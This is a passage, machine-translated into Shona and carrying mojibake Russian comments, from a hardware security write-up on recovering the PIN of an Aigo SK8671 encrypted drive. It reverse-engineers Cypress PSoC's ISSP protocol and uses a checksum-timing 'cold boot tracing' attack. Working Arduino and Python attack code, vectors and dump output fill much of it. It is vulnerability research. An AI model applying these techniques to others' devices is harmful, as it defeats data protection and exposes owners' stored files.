Ichi chikamu chechipiri uye chekupedzisira chechinyorwa pamusoro pekubira ekunze-yekuvharisa madhiraivha. Rega ndikuyeuchidze kuti wandaishanda naye munguva pfupi yapfuura akandiunzira Patriot (Aigo) SK8671 hard drive, uye ndakasarudza kuidzosera, uye ikozvino ndiri kugovera zvakabuda mairi. Usati wawedzera kuverenga, iva nechokwadi chokuti waverenga zvinyorwa.
4. Tinotanga kutora dump kubva mukati mePSoC flash drive
Saka, zvese zvinoratidza (sezvatakasimbisa mu [chikamu chekutanga] ()) kuti iyo PIN kodhi inochengetwa mukudzika kwePSoC. Naizvozvo, tinofanira kuverenga zvakadzama kupenya uku. Pamberi pebasa rinodiwa:
- tora kutonga kwe "kutaurirana" neiyo microcontroller;
- tsvaga nzira yekutarisa kana iyi "kutaurirana" yakadzivirirwa kubva pakuverenga kubva kunze;
- tsvaga nzira yekunzvenga kudzivirira.
Pane nzvimbo mbiri pazvine musoro kutsvaga PIN kodhi inoshanda:
- mukati flash memory;
- SRAM, uko pini kodhi inogona kuchengetwa kuti ienzanise nepini kodhi yakapinda nemushandisi.
Ndichitarisa kumberi, ndichaona kuti ndichiri kukwanisa kutora kuraswa kwemukati mePSoC flash drive - ndichipfuura chengetedzo yayo ndichishandisa kurwisa kwehardware kunonzi "cold boot tracing" - mushure mekudzoreredza hunyanzvi husina kunyorwa hweiyo ISSP protocol. Izvi zvakanditendera kuti ndirase zvakananga PIN kodhi.
$ ./psoc.py
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9Final program code:
- ;
- .
5. ISSP protocol
5.1. Chii chinonzi ISSP
"Kukurukurirana" ine microcontroller inogona kureva zvinhu zvakasiyana-siyana: kubva "mutengesi kune mutengesi" kusvika pakubatana uchishandisa serial protocol (somuenzaniso, ICSP yePIC yeMicrochip).
Cypress ine yayo proprietary protocol yeiyi, inonzi ISSP (in-system serial programming protocol), iyo inotsanangurwa zvishoma mu. . inopawo rumwe ruzivo. Kune zvakare OpenSource yakaenzana inonzi HSSP (tichaishandisa mushure mechinguva chidiki). ISSP inoshanda sezvinotevera:
- reboot PSoC;
- buritsa iyo nhamba yemashiripiti kune serial data pini yePSoC iyi; kupinda kunze programming mode;
- tumira mirairo, iyo yakareba tambo tambo inonzi "vectors".
Zvinyorwa zveISSP zvinotsanangura aya mavheji kune mashoma mashoma emirairo:
- Kutanga-1
- Kutanga-2
- Tanga-3 (3V uye 5V sarudzo)
- ID-SETUP
- VERENGA-ID-SHOKO
- SET-BLOCK-NUM: 10011111010dddddddd111, uko dddddddd=block #
- BULK ERASE
- PROGRAM-BLOCK
- VERIFY-SETUP
- VERENGA-BYTE: 10110aaaaaZDDDDDDDDZ1, uko DDDDDDDD = data kunze, aaaaaa = kero (6 bits)
- NYORA-BYTE: 10010aaaaadddddd111, uko dddddddd = data mukati, aaaaaa = kero (6 bits)
- SIMBA
- CHECKSUM-SETUP
- VERENGA-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDDDZ1, uko DDDDDDDDDDDDDDDDDD = data kunze: mudziyo checksum
- DZIMA BLOCK
Semuenzaniso, iyo vector yeInitialize-2:
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111Mavekita ese ane hurefu hwakafanana: 22 bits. Zvinyorwa zveHSSP zvine rumwe ruzivo nezveISSP: "ISSP vector haisi chimwe chinhu kunze kwekutevedzana kunomiririra seti yemirairo."
5.2. Demystifying Vectors
Ngatione kuti chii chiri kuitika pano. Pakutanga, ndakafungidzira kuti mavheti mamwe chete aya aive manyoro emirairo yeM8C, asi mushure mekutarisa iyi hypothesis, ndakaona kuti maopcode ekuvhiya aisaenderana.
Ndakabva nda googler pa vector iri kumusoro ndichibva ndaona chidzidzo apo munyori, kunyange zvazvo asingapindi muudzame, anopa mamwe mazano anobatsira: βMurairo mumwe nomumwe unotanga nezvimedu zvitatu zvinoenderana nechimwe chezvina mnemonics (verenga kubva kuRAM, nyorera RAM, verenga bhuku rekunyora, rejista). Kozoita 8 kero bits, inoteverwa ne8 data bits (verenga kana kunyora) uye pakupedzisira matatu akamira mabits."
Ipapo ndakakwanisa kunhonga rumwe ruzivo rwakakosha kubva kune Supervisory ROM (SROM) chikamu. . SROM iROM yakaoma-coded muPSoC iyo inopa utility mabasa (nenzira yakafanana neSyscall) yekodhi yepurogiramu inomhanya munzvimbo yemushandisi:
- 00h:SWBootReset
- 01h: ReadBlock
- 02h: WriteBlock
- 03h: EraseBlock
- 06h: Tafura Read
- 07h: CheckSum
- 08h: Calibrate0
- 09h: Calibrate1
Nekuenzanisa mazita evector kumabasa eSROM, tinogona mepu mabasa akasiyana siyana anotsigirwa neprotocol iyi kune inotarisirwa SROM paramita. Nekuda kweizvi, isu tinokwanisa decode matatu ekutanga mabheti eISSP mavheji:
- 100 => "kupenga"
- 101 => βrdmemβ
- 110 => "kukanganisa"
- 111 => "dreg"
Nekudaro, nzwisiso yakazara ye-on-chip maitiro inogona chete kuwanikwa kuburikidza nekutaurirana kwakananga nePSoC.
5.3. Kukurukurirana nePSoC
Sezvo Dirk Petrautsky atova Cypress's HSSP kodhi paArduino, ndakashandisa Arduino Uno kubatanidza kune ISSP yekubatanidza yebhodhi bhodhi.
Ndokumbira utarise kuti mukati mekutsvaga kwangu, ndakachinja kodhi yaDirk zvishoma. Unogona kuwana shanduko yangu paGitHub: uye inoenderana Python script yekutaurirana neArduino, mune yangu repository .
Saka, ndichishandisa Arduino, ndakatanga kushandisa chete "yepamutemo" mavheji e "kutaurirana". Ndakaedza kuverenga iyo yemukati ROM ndichishandisa iyo VERIFY command. Sezvaitarisirwa, handina kukwanisa kuita izvi. Zvichida nekuda kwekuti kuverenga mabheti ekudzivirira anoiswa mukati meiyo flash drive.
Ipapo ini ndakagadzira mashoma angu akareruka mavheji ekunyora uye kuverenga ndangariro / maregister. Ndapota cherechedza kuti tinogona kuverenga SROM yose kunyange zvazvo flash drive yakachengetedzwa!
5.4. Kuzivikanwa kwe-on-chip marejista
Mushure mekutarisa mavheti e "disassembled", ndakaona kuti mudziyo unoshandisa zvinyorwa zvisina kunyorwa (0xF8-0xFA) kutsanangura M8C opcodes, dzinoitwa zvakananga, dzichipfuura dziviriro. Izvi zvakanditendera kuti ndimhanye maopcode akasiyana akadai se "ADD", "MOV A, X", "PUSH" kana "JMP". Ndinotenda kwavari (nekutarisa mhedzisiro yavainayo pamarejista) ndakakwanisa kuona kuti ndeapi ezvinyorwa zvisina kunyorwa aive marejista enguva dzose (A, X, SP uye PC).
Nekuda kweizvozvo, iyo "disassembled" kodhi inogadzirwa neHSSP_disas.rb chishandiso chinotaridzika seizvi (ndakawedzera zvirevo kuti zvijeke):
--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00 # ΡΠ±ΡΠΎΡ ΡΠ»Π°Π³ΠΎΠ²
[DE C0 1C] wrreg SP (f6), 0x00 # ΡΠ±ΡΠΎΡ SP
[9F 07 5C] wrmem KEY1, 0x3A # ΠΎΠ±ΡΠ·Π°ΡΠ΅Π»ΡΠ½ΡΠΉ Π°ΡΠ³ΡΠΌΠ΅Π½Ρ Π΄Π»Ρ SSC
[9F 20 7C] wrmem KEY2, 0x03 # Π°Π½Π°Π»ΠΎΠ³ΠΈΡΠ½ΠΎ
[DE A0 1C] wrreg PCh (f5), 0x00 # ΡΠ±ΡΠΎΡ PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03 # (LSB) ... Π΄ΠΎ 3 ??
[9F 70 1C] wrmem POINTER, 0x80 # RAM-ΡΠΊΠ°Π·Π°ΡΠ΅Π»Ρ Π΄Π»Ρ Π²ΡΡ
ΠΎΠ΄Π½ΡΡ
Π΄Π°Π½Π½ΡΡ
[DF 26 1C] wrreg opc1 (f9), 0x30 # ΠΠΏΠΊΠΎΠ΄ 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40 # ΠΠΏΠΊΠΎΠ΄ 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01 # BLOCK ID Π΄Π»Ρ Π²ΡΠ·ΠΎΠ²Π° SSC
[DE 00 DC] wrreg A (f0), 0x06 # Π½ΠΎΠΌΠ΅Ρ "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00 # ΠΠΏΠΊΠΎΠ΄ Π΄Π»Ρ SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12 # ΠΠ΅Π΄ΠΎΠΊΡΠΌΠΌΠ΅Π½ΡΠΈΡΠΎΠ²Π°Π½Π½Π°Ρ ΠΎΠΏΠ΅ΡΠ°ΡΠΈΡ: Π²ΡΠΏΠΎΠ»Π½ΠΈΡΡ Π²Π½Π΅ΡΠ½ΠΈΠΉ ΠΎΠΏΠΊΠΎΠ΄
5.5. Security bits
Panguva ino ini ndinogona kutotaurirana nePSoC, asi ini handisati ndave neruzivo rwakavimbika nezve mabhiti ekuchengetedza flash drive. Ndakashamiswa zvikuru nenyaya yekuti Cypress haipe mushandisi wemudziyo chero nzira yekutarisa kana dziviriro yakaitwa. Ndakachera zvakadzika muGoogle kuti pakupedzisira ndinzwisise kuti iyo HSSP kodhi yakapihwa neCypress yakagadziridzwa mushure mekunge Dirk aburitsa shanduko yake. Uye saka! Iyi vector nyowani yaonekwa:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # Π½Π΅ΠΈΠ·Π²Π΅ΡΡΠ½ΡΠ΅ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΡ
[9F E0 1C] wrmem 0xFF, 0x00 # Π°Π½Π°Π»ΠΎΠ³ΠΈΡΠ½ΠΎ
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10 # Π½Π΅Π΄ΠΎΠΊΡΠΌΠ΅Π½ΡΠΈΡΠΎΠ²Π°Π½Π½ΡΠΉ syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Tichishandisa iyi vector (ona read_security_data mu psoc.py), tinowana ese mabheti ekuchengetedza muSRAM pa0x80, pane mabhiti maviri pavharovha yakachengetedzwa.
Mhedzisiro inoodza mwoyo: zvese zvinodzivirirwa mu "dzima kuverenga nekunyora kwekunze". Naizvozvo, kwete chete isu hatigone kuverenga chero chinhu kubva kune flash drive, asi isu hatigone kunyora chero chinhu (semuenzaniso, kuisa ROM dumper ipapo). Uye nzira chete yekudzima kudzivirira ndeyekudzima zvachose chip yese. π
6. Kutanga (kukundikana) kurwisa: ROMX
Nekudaro, isu tinogona kuyedza hunyengeri hunotevera: sezvo isu tichigona kuita zvisina tsarukano opcode, wadii kuita ROMX, iyo inoshandiswa kuverenga flash memory? Iyi nzira ine mukana wakanaka wekubudirira. Nekuti iyo ReadBlock basa rinoverenga data kubva kuSROM (iro rinoshandiswa nemavekita) rinotarisa kana richidanwa kubva kuISSP. Nekudaro, iyo ROMX opcode inogona kunge isina cheki yakadaro. Saka heino kodhi yePython (mushure mekuwedzera mashoma ekubatsira makirasi kuArduino kodhi):
for i in range(0, 8192):
write_reg(0xF0, i>>8) # A = 0
write_reg(0xF3, i&0xFF) # X = 0
exec_opcodes("x28x30x40") # ROMX, HALT, NOP
byte = read_reg(0xF0) # ROMX reads ROM[A|X] into A
print "%02x" % ord(byte[0]) # print ROM byteSezvineiwo kodhi iyi haishande. π Kana kuti zvinoshanda, asi pakubuda tinowana edu ega opcode (0x28 0x30 0x40)! Ini handifunge kuti inoenderana mashandiro echishandiso chinhu chekuchengetedza kuverenga. Izvi zvakanyanya sehunyanzvi hweinjiniya: kana uchiita maopcode ekunze, bhazi reROM rinodzoserwa kune imwe nguva buffer.
7. Kurwisa Kwechipiri: Cold Boot Tracing
Sezvo hunyengeri hweROMX husina kushanda, ndakatanga kufunga nezveimwe mutsauko weiyi hunyengeri - yakatsanangurwa mukudhindwa. .
7.1. Implementation
Zvinyorwa zveISSP zvinopa iyo inotevera vector yeCHECKSUM-SETUP:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Izvi zvinonyanya kudaidza SROM basa 0x07, sekuratidzwa mune zvinyorwa (italics mine):
Iri basa checksum verification. Iyo inoverengera 16-bit cheki yehuwandu hwemabhuroki anotsanangurwa nemushandisi mune imwe flash bank, kutanga kubva zero. Iyo BLOCKID parameter inoshandiswa kupfuudza huwandu hwezvivharo zvichashandiswa pakuverenga cheki. Kukosha kwe "1" kunongoverengera cheki ye block zero; nepo "0" ichaita kuti cheki yese ye256 blocks yeflash bank iverengerwe. Iyo 16-bit cheki inodzoserwa kuburikidza neKEY1 uye KEY2. Iyo KEY1 paramende inochengetedza yakaderera-kurongeka 8 mabhiti echeki, uye KEY2 paramende inochengeta yakakwira-kurongeka 8 bits. Kune zvishandiso zvine akati wandei flash mabhanga, iyo checksum basa inodanwa kune imwe neimwe zvakasiyana. Nhamba yebhangi yaichashanda nayo inotarwa neFLS_PR1 rejista (nekumisa bhiti mariri zvinoenderana nebhangi rakatarwa).
Ziva kuti iyi icheki yakapusa: mabhayiti anongowedzerwa imwe mushure meimwe; hapana fancy CRC quirks. Uye zvakare, ndichiziva kuti iyo M8C musimboti ine diki seti yemarejista, ndakafunga kuti kana ndichiverenga cheki, yepakati kukosha icharekodhwa mumhando imwechete iyo inozoenda kune inobuda: KEY1 (0xF8) / KEY2 ( 0xF9).
Saka muchirevo kurwisa kwangu kunoratidzika seizvi:
- Isu tinobatana neISSP.
- Isu tinotanga iyo checksum kuverenga tichishandisa iyo CHECKSUM-SETUP vector.
- Isu tinotangazve processor mushure menguva yakatarwa T.
- Isu tinoverenga RAM kuti titore yazvino cheki C.
- Dzokorora matanho 3 ne4, uchiwedzera T zvishoma nguva imwe neimwe.
- Isu tinodzosera data kubva kune flash drive nekubvisa yapfuura cheki C kubva kune yazvino.
Nekudaro, pane dambudziko: iyo Initialize-1 vector yatinofanira kutumira mushure mekutangazve inonyora KEY1 uye KEY2:
1100101000000000000000 # ΠΠ°Π³ΠΈΡ, ΠΏΠ΅ΡΠ΅Π²ΠΎΠ΄ΡΡΠ°Ρ PSoC Π² ΡΠ΅ΠΆΠΈΠΌ ΠΏΡΠΎΠ³ΡΠ°ΠΌΠΌΠΈΡΠΎΠ²Π°Π½ΠΈΡ
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΠ½Π°Ρ ΡΡΠΌΠΌΠ° ΠΏΠ΅ΡΠ΅Π·Π°ΠΏΠΈΡΡΠ²Π°Π΅ΡΡΡ Π·Π΄Π΅ΡΡ
[9F 20 7C] wrmem KEY2, 0x03 # ΠΈ Π·Π΄Π΅ΡΡ
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09 # SROM-ΡΡΠ½ΠΊΡΠΈΡ 9
[DF 00 1C] wrreg opc0 (f8), 0x00 # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Iyi kodhi inodarika cheki yedu yakakosha nekudaidza Calibrate1 (SROM basa 9)... Zvichida tinogona kungotumira nhamba yemashiripiti (kubva pakutanga kwekodhi kumusoro) kuti tiise purogiramu yekugadzira, uye wozoverenga SRAM? Uye hongu, inoshanda! Iyo Arduino kodhi inoshandisa iyi kurwisa iri nyore:
case Cmnd_STK_START_CSUM:
checksum_delay = ((uint32_t)getch())<<24;
checksum_delay |= ((uint32_t)getch())<<16;
checksum_delay |= ((uint32_t)getch())<<8;
checksum_delay |= getch();
if(checksum_delay > 10000) {
ms_delay = checksum_delay/1000;
checksum_delay = checksum_delay%1000;
}
else {
ms_delay = 0;
}
send_checksum_v();
if(checksum_delay)
delayMicroseconds(checksum_delay);
delay(ms_delay);
start_pmode();- Verenga checkum_kunonoka.
- Mhanyai checksum calculation (send_checksum_v).
- Mirira kwenguva yakatarwa; tichifunga zvinotevera misungo:
- Ndakapedza nguva yakawanda kusvika ndazoziva kuti zvakamira sei inoshanda nemazvo chete nekunonoka kusingapfuuri 16383 ΞΌs;
- uyezve ndakauraya nguva imwechete kusvika ndaona kuti kunonokaMicroseconds, kana 0 ikapfuudzwa kwairi seyekupinza, inoshanda zvisizvo zvachose!
- Reboot iyo PSoC muchirongwa chekugadzirisa (isu tinongotumira nhamba yemashiripiti, pasina kutumira mavheti ekutanga).
Kodhi yekupedzisira muPython:
for delay in range(0, 150000): # Π·Π°Π΄Π΅ΡΠΆΠΊΠ° Π² ΠΌΠΈΠΊΡΠΎΡΠ΅ΠΊΡΠ½Π΄Π°Ρ
for i in range(0, 10): # ΠΊΠΎΠ»ΠΈΡΠ΅ΡΡΠ²ΠΎ ΡΡΠΈΡΡΠ²Π°Π½ΠΈΡ Π΄Π»Ρ ΠΊΠ°ΠΆΠ΄ΠΎΠΉΠΈΠ· Π·Π°Π΄Π΅ΡΠΆΠ΅ΠΊ
try:
reset_psoc(quiet=True) # ΠΏΠ΅ΡΠ΅Π·Π°Π³ΡΡΠ·ΠΊΠ° ΠΈ Π²Ρ
ΠΎΠ΄ Π² ΡΠ΅ΠΆΠΈΠΌ ΠΏΡΠΎΠ³ΡΠ°ΠΌΠΌΠΈΡΠΎΠ²Π°Π½ΠΈΡ
send_vectors() # ΠΎΡΠΏΡΠ°Π²ΠΊΠ° ΠΈΠ½ΠΈΡΠΈΠ°Π»ΠΈΠ·ΠΈΡΡΡΡΠΈΡ
Π²Π΅ΠΊΡΠΎΡΠΎΠ²
ser.write("x85"+struct.pack(">I", delay)) # Π²ΡΡΠΈΡΠ»ΠΈΡΡ ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΠ½ΡΡ ΡΡΠΌΠΌΡ + ΠΏΠ΅ΡΠ΅Π·Π°Π³ΡΡΠ·ΠΈΡΡΡΡ ΠΏΠΎΡΠ»Π΅ Π·Π°Π΄Π΅ΡΠΆΠΊΠΈ
res = ser.read(1) # ΡΡΠΈΡΠ°ΡΡ arduino ACK
except Exception as e:
print e
ser.close()
os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # ΠΎΡΠΊΡΡΡΡ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°ΡΠ΅Π»ΡΠ½ΡΠΉ ΠΏΠΎΡΡ
continue
print "%05d %02X %02X %02X" % (delay, # ΡΡΠΈΡΠ°ΡΡ RAM-Π±Π°ΠΉΡΡ
read_regb(0xf1),
read_ramb(0xf8),
read_ramb(0xf9))Muchidimbu, izvo kodhi iyi inoita:
- Reboots iyo PSoC (uye inotumira iyo nhamba yemashiripiti).
- Inotumira yakazara mavheji ekutanga.
- Inodaidza basa reArduino Cmnd_STK_START_CSUM (0x85), uko kunonoka kwemamicroseconds kunopfuudzwa separameter.
- Inoverenga cheki (0xF8 uye 0xF9) uye rejista isina kunyorwa 0xF1.
Iyi kodhi inoitwa ka10 mu1 microsecond. 0xF1 inosanganisirwa pano nekuti ndiyo chete rejista yakachinja pakuverenga cheki. Zvichida imhando yenguva pfupi inoshandiswa nearithmetic logic unit. Ziva iyo yakashata hack yandinoshandisa kuseta iyo Arduino uchishandisa picocom apo Arduino inomira kuratidza zviratidzo zvehupenyu (hapana zano nei).
7.2. Kuverenga mhedzisiro
Mhedzisiro yePython script inoita seizvi (yakarerutswa kuti iverengeke):
DELAY F1 F8 F9 # F1 β Π²ΡΡΠ΅ΡΠΏΠΎΠΌΡΠ½ΡΡΡΠΉ Π½Π΅ΠΈΠ·Π²Π΅ΡΡΠ½ΡΠΉ ΡΠ΅Π³ΠΈΡΡΡ
# F8 ΠΌΠ»Π°Π΄ΡΠΈΠΉ Π±Π°ΠΉΡ ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΠ½ΠΎΠΉ ΡΡΠΌΠΌΡ
# F9 ΡΡΠ°ΡΡΠΈΠΉ Π±Π°ΠΉΡ ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΠ½ΠΎΠΉ ΡΡΠΌΠΌΡ
00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΠ½Π°Ρ ΡΡΠΌΠΌΠ° ΡΠ±ΡΠ°ΡΡΠ²Π°Π΅ΡΡΡ Π² 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00 # 1-ΠΉ Π±Π°ΠΉΡ: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00 # 2-ΠΉ Π±Π°ΠΉΡ: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01 # ΠΏΠΎΠ½ΡΡΠΈΡ Π½Π΅ ΠΈΠΌΠ΅Ρ, ΡΡΠΎ Π·Π΄Π΅ΡΡ ΠΏΡΠΎΠΈΡΡ
ΠΎΠ΄ΠΈΡ
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # Π‘Π½ΠΎΠ²Π° E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00 # Π₯ΠΌΠΌΠΌΠΌΠΌΠΌ
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01 # Π, Π΄ΠΎΡΠ»ΠΎ! ΠΠΎΡ ΠΎΠ½ ΠΆΠ΅ ΠΏΠ΅ΡΠ΅Π½ΠΎΡ Π² ΡΡΠ°ΡΡΠΈΠΉ Π±Π°ΠΉΡ
00063 01 17 01
[...]
00075 CC 17 01 # ΠΡΠ°ΠΊ, 0x117-0xE7: 0x30Izvo zviri kutaurwa, isu tine dambudziko: sezvo isu tiri kushanda necheki chaiyo, null byte haichinji kukosha kwekuverenga. Nekudaro, sezvo iyo yese yekuverenga maitiro (8192 bytes) inotora 0,1478 masekonzi (nekusiyana kudiki pese painomhanya), iyo inoenzana neanosvika 18,04 ΞΌs pabyte, tinogona kushandisa nguva ino kutarisa kukosha kwecheki panguva dzakakodzera. Kune yekutanga inomhanya, zvese zvinoverengwa zviri nyore, sezvo nguva yekuverengera maitiro inogara yakangofanana. Nekudaro, kupera kwekuraswa uku hakuna kunyatso kurongeka nekuti "diki diki kutsauka nguva" pane imwe neimwe kumhanya kunowedzera kuti ive yakakosha:
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DDNdiko marara gumi ega ega microsecond kunonoka. Yese yekushanda nguva yekurasa ese 10 bytes yeflash drive ingangoita maawa makumi mana nemasere.
7.3. Flash binary reconstruction
Ini handisati ndapedza kunyora kodhi iyo inozogadzirisa zvachose kodhi yepurogiramu yeflash drive, tichifunga nezvese kutsauka nguva. Nekudaro, ini ndatodzoreredza kutanga kwekodhi iyi. Kuti ndive nechokwadi chekuti ndazviita nemazvo, ndakaibvisa ndichishandisa m8cdis:
0000: 80 67 jmp 0068h ; Reset vector
[...]
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
[...]
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f retZvinoita sezvine musoro!
7.4. Kutsvaga PIN kodhi kero yekuchengetedza
Iye zvino zvatave kukwanisa kuverenga cheki panguva dzatinoda, tinogona kutarisa zviri nyore kuti uye kupi inoshanduka kana isu:
- isa PIN kodhi isiriyo;
- chinja pin code.
Kutanga, kuti nditsvage kero yekuchengetera, ndakatora cheki yekurasa mu10 ms increments mushure mekutangazve. Ndakabva ndaisa PIN isiriyo ndokuita zvimwe chete.
Muuyo wacho wakanga usina kufadza zvikuru, sezvo kwakanga kune chinjo dzakawanda. Asi pakupedzisira ndakakwanisa kuona kuti cheki yakachinja kumwe pakati pe120000 Β΅s uye 140000 Β΅s yekunonoka. Asi iyo "pincode" yandakaratidza ipapo yaive isiriyo zvachose - nekuda kwechigadzirwa chekunonokaMicroseconds maitiro, anoita zvinhu zvinoshamisa kana 0 yapfuudzwa kwairi.
Zvino, mushure mekupedza angangoita maawa matatu, ndakarangarira kuti iyo SROM system call CheckSum inogamuchira gakava sekuisa iyo inotsanangura huwandu hwezvivharo zvecheki! Izvozvo. isu tinogona nyore kuisa kero yekuchengetedza yePIN kodhi uye "zvisirizvo zviyedzo" counter, nekurongeka kwekusvika ku3-byte block.
Kumhanya kwangu kwekutanga kwakaburitsa zvinotevera:
Ipapo ndakachinja PIN kodhi kubva "123456" kuita "1234567" ndikawana:
Nokudaro, iyo PIN code uye counter yekuedza kusina kururama inoratidzika kunge yakachengetwa muvharo Nhamba 126.
7.5. Kutora kuraswa kwebhuroko Nhamba 126
Block #126 inofanira kuwanikwa kune imwe nzvimbo yakatenderedza 125x64x18 = 144000ΞΌs, kubva pakutanga kwekuverenga cheki, mune yangu yekurasa izere, uye inotaridzika kuva inonzwisisika. Zvino, mushure mekusefa nemaoko kunze kwakawanda kusiri kushanda (nekuda kwekuunganidzwa kwe "diki diki kutsauka kwenguva"), ndakaguma ndawana aya mabhaiti (pa latency ye145527 ΞΌs):
Zviripachena kuti iyo PIN kodhi inochengetwa isina kunyorwa fomu! Aya maitiro, hongu, haana kunyorwa mumakodhi eASCII, asi sezvazvinozoitika, anoratidza kuverenga kwakatorwa kubva kune capacitive keyboard.
Pakupedzisira, ndakamhanyisa mimwe bvunzo kuti ndiwane pakange pakachengetwa counter yakaipa yekuedza. Heino mhedzisiro:
0xFF - zvinoreva "15 kuedza" uye inoderera nekuedza kwega kwega kwakakundikana.
7.6. PIN kodhi kupora
Heino kodhi yangu yakashata inoisa zviri pamusoro pamwechete:
def dump_pin():
pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
last_csum = 0
pin_bytes = []
for delay in range(145495, 145719, 16):
csum = csum_at(delay, 1)
byte = (csum-last_csum)&0xFF
print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
pin_bytes.append(byte)
last_csum = csum
print "PIN: ",
for i in range(0, len(pin_bytes)):
if pin_bytes[i] in pin_map:
print pin_map[pin_bytes[i]],
printHeino mhedzisiro yekuitwa kwayo:
$ ./psoc.py
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9Hooray! Works!
Ndokumbira utarise kuti latency values ββyandakashandisa ingangove yakakosha kune imwe chaiyo PSoC - yandakashandisa.
8. Chii chinotevera?
